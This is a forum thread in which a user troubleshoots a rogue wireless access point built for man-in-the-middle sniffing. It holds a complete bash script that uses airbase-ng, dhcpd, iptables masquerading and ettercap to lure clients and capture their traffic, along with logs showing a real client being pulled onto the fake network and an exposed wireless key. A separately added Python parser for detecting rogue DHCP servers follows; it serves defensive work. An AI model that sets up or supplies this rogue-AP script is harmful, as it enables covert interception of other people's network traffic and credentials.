
Thread: Need help with Rogue AP

  1. #1
    Just burned his ISO | Join Date: Feb 2009 | Posts: 5

    Need help with Rogue AP

    I'm trying to set up a rogue AP as described in this thread: hxxp://forums.remote-exploit.org/showthread.php?t=19048

    I've been trying different things all day and just can't get it to work. I'm using an Alfa card for the AP and my laptop's built-in wifi card for the internet connection, and I've tried both in VMware and a hard disk install of BT3. I am able to connect to the AP from my client computer but can't access the internet. I understand most of the script pretty well except the iptables stuff. I've already tried everything in the thread, including setting the MTU to 1500, trying without starting up ettercap and manually inputting the commands one by one... nothing seems to help... Anyone have any ideas?

  2. #2
    Just burned his ISO | Join Date: Feb 2009 | Posts: 5

    Need help with Rogue AP

    I'm trying to make a rogue AP for MITM sniffing as described in this thread:
    hxxp://forums.remote-exploit.org/showthread.php?t=19048

    I've tried everything in the thread and then some, but I'm not able to get on the internet from my client PC. I use an Alfa card for the AP and my laptop's built-in wifi for the internet connection. For BackTrack I've tried from VMware and from a hard drive install; it made no difference... I also tried both 1400 and 1500 for the MTU values. I've been at it all day but right now I have no more ideas, so any help is appreciated...

  3. #3
    Senior Member ShadowKill | Join Date: Dec 2007 | Posts: 908

    Quote Originally Posted by che4in:
    I'm trying to set up a rogue AP as described in this thread: hxxp://forums.remote-exploit.org/showthread.php?t=19048

    I've been trying different things all day and just can't get it to work. I'm using an Alfa card for the AP and my laptop's built-in wifi card for the internet connection, and I've tried both in VMware and a hard disk install of BT3. I am able to connect to the AP from my client computer but can't access the internet. I understand most of the script pretty well except the iptables stuff. I've already tried everything in the thread, including setting the MTU to 1500, trying without starting up ettercap and manually inputting the commands one by one... nothing seems to help... Anyone have any ideas?
    I have one. Not creating two identical threads....

    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  4. #4
    Just burned his ISO | Join Date: Feb 2009 | Posts: 5

    Quote Originally Posted by ShadowKill:
    I have one. Not creating two identical threads....

    Heh, I didn't see the thing about it not being posted until a mod reads it.

  5. #5
    Senior Member | Join Date: Apr 2008 | Posts: 2,008

    Quote Originally Posted by che4in:
    I'm trying to make a rogue AP for MITM sniffing as described in this thread:
    hxxp://forums.remote-exploit.org/showthread.php?t=19048

    I've tried everything in the thread and then some, but I'm not able to get on the internet from my client PC. I use an Alfa card for the AP and my laptop's built-in wifi for the internet connection. For BackTrack I've tried from VMware and from a hard drive install; it made no difference... I also tried both 1400 and 1500 for the MTU values. I've been at it all day but right now I have no more ideas, so any help is appreciated...

    This attack is rather involved and there are numerous errors one can easily make. At this point you do not provide us with much information about your setup, apart from the fact that you are following this specific tutorial.

    I would suggest that you start with carefully reading through the whole thread and other similar threads, unless you have already done so. If you are not able to pinpoint the source of the problem by yourself after this, provide us with all the commands you use along with detailed information about your network setup.

    -Monkeys are like nature's humans.

  6. #6
    Just burned his ISO | Join Date: Feb 2009 | Posts: 5

    I have read the whole thread more than once and tried to look up any other info I could before I posted. So far I have made an AP (with AWUS036H) and have DHCPD and Ettercap running (I've also tried without ettercap). I can connect with my client (Vista) but cannot access the internet... here is my net info and some logs that might help:

    Network info:
    lo no wireless extensions.

    eth0 no wireless extensions.

    eth1 IEEE 802.11b/g ESSID:"INDIANA" Nickname:"Broadcom 4318"
    Mode:Managed Frequency=2.462 GHz Access Point: 00:1B:2F:01:E2:B2
    Bit Rate=24 Mb/s Tx-Power=18 dBm
    RTS thr:off Fragment thr:off
    Encryption key:C79A-4F59-AE Security mode:open
    Link Quality=75/100 Signal level=-41 dBm Noise level=-70 dBm
    Rx invalid nwid:0 Rx invalid crypt:1 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:0 Missed beacon:0

    wlan0 802.11b/g Mode:Monitor Channel=11 Bit Rate=11 Mb/s
    Tx-Power=5 dBm
    Retry:on Fragment thr:off
    Link Quality=96/100 Signal level=-156 dBm Noise level=-252 dBm
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:0 Missed beacon:0

    at0 no wireless extensions.

    DHCPD log:
    Code:
    Internet Systems Consortium DHCP Server V3.0.6
    Copyright 2004-2007 Internet Systems Consortium.
    All rights reserved.
    Wrote 0 leases to leases file.
    Listening on LPF/at0/00:11:22:33:44:55/10.0.0/24
    Sending on   LPF/at0/00:11:22:33:44:55/10.0.0/24
    Sending on   Socket/fallback/fallback-net
    DHCPREQUEST for 192.168.1.9 from 00:13:e8:50:59:45 via at0: wrong network.
    DHCPNAK on 192.168.1.9 to 00:13:e8:50:59:45 via at0
    DHCPREQUEST for 192.168.1.9 from 00:13:e8:50:59:45 via at0: wrong network.
    DHCPNAK on 192.168.1.9 to 00:13:e8:50:59:45 via at0
    DHCPREQUEST for 192.168.1.9 from 00:13:e8:50:59:45 via at0: wrong network.
    DHCPNAK on 192.168.1.9 to 00:13:e8:50:59:45 via at0
    DHCPREQUEST for 192.168.1.9 from 00:13:e8:50:59:45 via at0: wrong network.
    DHCPNAK on 192.168.1.9 to 00:13:e8:50:59:45 via at0
    DHCPREQUEST for 192.168.1.9 from 00:13:e8:50:59:45 via at0: wrong network.
    DHCPNAK on 192.168.1.9 to 00:13:e8:50:59:45 via at0
    DHCPDISCOVER from 00:13:e8:50:59:45 via at0
    DHCPOFFER on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 (10.0.0.1) from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 (10.0.0.1) from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 (10.0.0.1) from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 (10.0.0.1) from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 (10.0.0.1) from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPINFORM from 10.0.0.254 via at0
    DHCPACK to 10.0.0.254 (00:13:e8:50:59:45) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPREQUEST for 10.0.0.254 from 00:13:e8:50:59:45 (Alex-PC) via at0
    DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
    continued.....

  7. #7
    Just burned his ISO | Join Date: Feb 2009 | Posts: 5

    Ettercap log:
    Code:
    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
    
    Listening on at0... (Ethernet)
    
       at0 ->       00:11:22:33:44:55          10.0.0.1     255.255.255.0
    
    Privileges dropped to UID 0 GID 0...
    
      28 plugins
      39 protocol dissectors
      53 ports monitored
    7587 mac vendor fingerprint
    1698 tcp OS fingerprint
    2183 known services
    
    Randomizing 255 hosts for scanning...
    Scanning the whole netmask for 255 hosts...
    * |==================================================>| 100.00 %
    
    0 hosts added to the hosts list...
    Starting Unified sniffing...
    
    
    Text only Interface activated...
    Hit 'h' for inline help
    
    DHCP: [00:13:E8:50:59:45] REQUEST 192.168.1.9
    DHCP: [00:13:E8:50:59:45] REQUEST 192.168.1.9
    DHCP: [00:13:E8:50:59:45] REQUEST 192.168.1.9
    DHCP: [00:13:E8:50:59:45] REQUEST 192.168.1.9
    DHCP: [00:13:E8:50:59:45] REQUEST 192.168.1.9
    DHCP: [00:13:E8:50:59:45] DISCOVER
    DHCP: [00:13:E8:50:59:45] DISCOVER
    DHCP: [00:13:E8:50:59:45] DISCOVER
    DHCP: [00:13:E8:50:59:45] DISCOVER
    DHCP: [10.0.0.1] OFFER : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 0.0.0.0 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:13:E8:50:59:45] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    I have tried both the original script and a modified script I made to suit my needs, as well as inputting the commands one by one manually. Here is my modified script:
    Code:
    #!/bin/bash
    # Prompt for the parameters passed to airbase-ng
    echo -n "ESSID:  "
    read -e  ESSID
    echo -n "AP CHANNEL:  "
    read -e CHAN
    echo -n "AP MAC:  "
    read -e APMAC
    echo -n "OTHER OPTIONS: [-z (type) WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104 ] 
                  [-Z (type) WPA2 tags  1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104 ]
                  [-X Hidden ESSID                                            ]"
    read -e OTHEROPT
    
    # Stop anything left over from a previous run and reset the Alfa card
    kill `cat /var/run/dhcpd.pid`
    killall -9 dhcpd airbase-ng ettercap dhcpcd
    airmon-ng stop wlan0
    ifconfig wlan0 down
    airmon-ng start wlan0
    sleep 15
    
    # Start the soft AP in its own konsole; airbase-ng creates the at0 tap interface
    modprobe tun 
    konsole -e airbase-ng -e "$ESSID" -P -C 30 -v -c $CHAN -a $APMAC $OTHEROPT wlan0 &
    sleep 10
    
    # Address at0 (10.0.0.1/24) and reset iptables; the MASQUERADE rule
    # rewrites traffic leaving through eth1, the laptop's uplink to INDIANA
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0 
    ifconfig at0 mtu 1500
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
    
    # Fresh lease file, then the DHCP server and ettercap on at0
    echo > '/var/state/dhcp/dhcpd.leases'
    konsole -e dhcpd -d -f -cf /etc/dhcpd.conf at0 &
    konsole -e ettercap -T -q -u -p -i at0 // // &
    sleep 8
    # Routing between at0 and eth1 only starts once forwarding is switched on
    echo "1" > /proc/sys/net/ipv4/ip_forward
    Also, from the client PC I am able to ping 10.0.0.254 but nothing else... Let me know if you have any ideas or what other info I can give you...
    Thanks in advance
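
The two logs in this thread are also what a network monitor sees when a station gets pulled onto an AP it did not expect: the client keeps asking to renew its old 192.168.1.9 lease, is NAKed with "wrong network", and then accepts a lease, gateway and DNS from a server that is not the one it had before. The parser below is an added example, not code from the thread or its author; the log lines are reduced copies of those posted above, and the trusted-server and trusted-DNS allow lists are assumptions a site would fill in itself.

```python
import re

# Constructed sample in the two formats seen in this thread (ISC dhcpd console
# log and ettercap's DHCP dissector), cut down to one exchange.
DHCPD_SAMPLE = """\
DHCPREQUEST for 192.168.1.9 from 00:13:e8:50:59:45 via at0: wrong network.
DHCPNAK on 192.168.1.9 to 00:13:e8:50:59:45 via at0
DHCPOFFER on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
DHCPREQUEST for 10.0.0.254 (10.0.0.1) from 00:13:e8:50:59:45 (Alex-PC) via at0
DHCPACK on 10.0.0.254 to 00:13:e8:50:59:45 (Alex-PC) via at0
"""
ETTERCAP_SAMPLE = """\
DHCP: [00:13:E8:50:59:45] REQUEST 192.168.1.9
DHCP: [10.0.0.1] OFFER : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
"""
NAK_RE = re.compile(r"^DHCPNAK on (\S+) to ([0-9a-f:]{17}) via", re.I)
ACK_RE = re.compile(r"^DHCPACK on (\S+) to ([0-9a-f:]{17})", re.I)
ETT_RE = re.compile(r"^DHCP: \[(\S+)\] (OFFER|ACK) : (\S+) (\S+) GW (\S+) DNS (\S+)$")


def renumbered_clients(dhcpd_log):
    """[(mac, old_ip, new_ip)] for clients that asked to keep a lease from
    another network, were NAKed, then accepted an address from this server:
    the sequence a station produces when it lands on an AP it did not expect."""
    naked, events = {}, []
    for line in dhcpd_log.splitlines():
        m = NAK_RE.match(line)
        if m:  # remember the address the client wanted to keep
            naked[m.group(2).lower()] = m.group(1)
            continue
        m = ACK_RE.match(line)  # "DHCPACK on <ip> to <mac>", not the INFORM form
        if m and m.group(2).lower() in naked:
            mac, new_ip = m.group(2).lower(), m.group(1)
            old_ip = naked.pop(mac)
            if old_ip != new_ip:
                events.append((mac, old_ip, new_ip))
    return events


def rogue_dhcp_servers(ettercap_log, trusted_servers, trusted_dns):
    """Distinct (server, gateway, dns) triples from OFFER/ACK lines where the
    answering server, or the DNS it hands out, is not on the allow list."""
    hits = []
    for line in ettercap_log.splitlines():
        m = ETT_RE.match(line)
        if not m:
            continue
        server, _, _, _, gw, dns = m.groups()
        if server not in trusted_servers or dns not in trusted_dns:
            if (server, gw, dns) not in hits:
                hits.append((server, gw, dns))
    return hits
```

Run against the full logs above, the first function reports the 00:13:e8:50:59:45 station moving from 192.168.1.9 to 10.0.0.254 once, despite the dozens of repeated REQUEST/ACK and INFORM lines, and the second reports 10.0.0.1 handing out 208.67.222.222 as DNS if neither is on the allow list.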
